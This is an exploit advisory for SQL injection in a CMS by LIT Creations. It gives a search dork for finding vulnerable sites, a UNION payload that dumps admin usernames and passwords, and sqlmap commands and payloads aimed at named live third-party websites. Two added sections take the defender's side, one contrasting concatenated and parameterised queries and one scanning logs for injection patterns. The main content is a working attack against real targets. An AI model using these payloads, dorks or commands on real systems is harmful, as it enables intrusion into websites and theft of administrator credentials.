#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
# Exploit Title: LIT Creations African CMS SQL injection
# Date: 2019-05-20
# Dork : intext:"Website designed and hosted by LIT Creations" inurl:id=
# Exploit Author: S I R M A X
# Vendor Homepage: https://www.litcreations.com/
# Version: All versions
# Tested on: win,linux
=================================================================================
[SQL injection]
[+] Method: SQL injection - H_A_Security Security Team of Iran
[+] Parameter: id (GET, e.g. product.php?id=)
=================================================================================
Hash mode: MD5
=================
-----== Way 1 (manual, no tool) ==-----
[#] Testing Method:
[+] - UNION query
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Exploits ==>
[*] id=-847' UNION SELECT 1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(table(admin))WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x75736572,0x203d3d3e20,usern,0x3c62723e,0x70617373,0x203d3d3e20,pswrd,0x3c62723e,0x3c62723e))))x),3,4,5,6,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(table(admin))WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x75736572,0x203d3d3e20,usern,0x3c62723e,0x70617373,0x203d3d3e20,pswrd,0x3c62723e,0x3c62723e))))x),[Number of columns]-- -
<-> #On every site seen, column 2 or 7 is the one that reflects the injected output
<-> #Note that you must first find the name of the admin table and substitute it into the payload
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
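Added example (not code from the advisory or from the LIT Creations CMS, whose source is not on this page): the root cause behind both "ways" above is an `id` value pasted straight into SQL text. The script below builds a constructed `product` table in an in-memory SQLite database (assumed stand-in for the MySQL backend sqlmap identified) and runs the boolean-based payload reported further down through a string-concatenated query and through a parameterised one, so the difference in behaviour can be seen side by side.

```python
import sqlite3


def make_db():
    # Constructed sample table; the real CMS schema is not on the page.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (id TEXT, name TEXT)")
    conn.executemany("INSERT INTO product VALUES (?, ?)",
                     [("847", "Vitamin C"), ("848", "Zinc")])
    return conn


def lookup_vulnerable(conn, product_id):
    """The pattern the advisory exploits: the GET value becomes part of the SQL text."""
    sql = "SELECT id, name FROM product WHERE id = '" + product_id + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterised(conn, product_id):
    """The fix: the driver binds the value, so it can only ever be a string literal."""
    sql = "SELECT id, name FROM product WHERE id = ?"
    return conn.execute(sql, (product_id,)).fetchall()


# Boolean-based payload exactly as sqlmap reported it (single-quote context, already decoded).
BOOLEAN_PAYLOAD = "847' AND 5651=5651 AND 'gEnD'='gEnD"


def demo():
    conn = make_db()
    return {
        "benign_vulnerable": lookup_vulnerable(conn, "847"),
        "payload_vulnerable": lookup_vulnerable(conn, BOOLEAN_PAYLOAD),
        "benign_parameterised": lookup_parameterised(conn, "847"),
        "payload_parameterised": lookup_parameterised(conn, BOOLEAN_PAYLOAD),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:24} -> {rows}")
```

In the concatenated version the appended `AND 5651=5651 AND 'gEnD'='gEnD` is executed as SQL and the row for 847 still comes back; that "page unchanged for a true condition" response is exactly what the blind technique measures. In the parameterised version the whole string is compared against the `id` column as one literal and nothing matches. In the PHP the CMS is written in, the equivalent fix is a PDO or mysqli prepared statement with the value bound rather than interpolated.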
=================================================================================================================================
-----== Way 2 (using sqlmap) ==-----
[+] Sqlmap:
[-] sqlmap.py -u https://gohealthy.co.za/product.php?id=1 --dbs
[#] Testing Method:
[+] - boolean-based blind
[+] - time-based blind
[+] - UNION query
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=847' AND 5651=5651 AND 'gEnD'='gEnD
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=847' AND SLEEP(5) AND 'spZF'='spZF
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Type: UNION query
Title: Generic UNION query (NULL) - 23 columns
Payload: id=-9178' UNION ALL SELECT NULL,CONCAT(0x716a717871,0x466f4b58426e547a66684763786150476779496f4b556548427069736d70664d414f5771615a6a50,0x716b7a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- qUjC
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
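Added example (not part of the advisory or of sqlmap): the three payload types sqlmap reported above leave recognisable shapes in a web server's access log. The script scans constructed combined-format log lines (RFC 5737 test addresses, not real traffic) for a UNION SELECT, a SLEEP() call and a boolean tautology in the `id` parameter, URL-decoding each value first so `%27`/`%20` encoding does not hide the keywords. Rule names and the log format are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines modelled on the payload shapes in the advisory.
LOG_LINES = [
    '203.0.113.5 - - [20/May/2019:10:00:01 +0000] "GET /product.php?id=1 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [20/May/2019:10:00:02 +0000] "GET /product.php?id=847%27%20AND%205651%3D5651'
    '%20AND%20%27gEnD%27%3D%27gEnD HTTP/1.1" 200 5120',
    '203.0.113.5 - - [20/May/2019:10:00:03 +0000] "GET /product.php?id=847%27%20AND%20SLEEP%285%29'
    '%20AND%20%27spZF%27%3D%27spZF HTTP/1.1" 200 5120',
    '203.0.113.5 - - [20/May/2019:10:00:09 +0000] "GET /product.php?id=-9178%27%20UNION%20ALL%20'
    'SELECT%20NULL%2CNULL--%20qUjC HTTP/1.1" 200 5120',
    '198.51.100.7 - - [20/May/2019:10:01:00 +0000] "GET /events.php?id=12 HTTP/1.1" 200 2048',
]

# Client address and request target from a combined-format line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')

# Ordered rules; the first one that matches names the finding.
RULES = [
    ("UNION SELECT", re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I)),
    ("time-based SLEEP()", re.compile(r"\bsleep\s*\(", re.I)),
    ("numeric tautology", re.compile(r"\b(?:and|or)\s+(\d+)\s*=\s*\1\b", re.I)),
    ("string tautology", re.compile(r"'(\w+)'\s*=\s*'\1(?!\w)", re.I)),
]


def classify(value):
    """Return the name of the first rule matching a decoded parameter value, or None."""
    normalised = re.sub(r"\s+", " ", value)
    for name, pattern in RULES:
        if pattern.search(normalised):
            return name
    return None


def scan(lines):
    """Return (client, path, parameter, finding) for every suspicious query value."""
    findings = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        parts = urlsplit(target)
        # parse_qs percent-decodes values, so %27 is seen as the quote it really is.
        for param, values in parse_qs(parts.query, keep_blank_values=True).items():
            for value in values:
                finding = classify(value)
                if finding:
                    findings.append((client, parts.path, param, finding))
    return findings


if __name__ == "__main__":
    for hit in scan(LOG_LINES):
        print(hit)
```

Matching after decoding is the important step: the boolean and time-based payloads only contain the keywords `AND`, `SLEEP` and `=` once `%20` and `%3D` are turned back into characters. The tautology rules are kept narrow (same number or same quoted word on both sides, preceded by AND/OR) so ordinary numeric ids such as `id=12` are not flagged.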
=================================================================================
Demo:
[+] https://www.thelearningpoint.co.za/events.php?id=[SQL]
[+] https://gohealthy.co.za/product.php?id=[SQL]
=================================================================================
[=] T.me/Sir_Max
[=] Telegram Channel ==> @H_A_SeCuRiTy
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#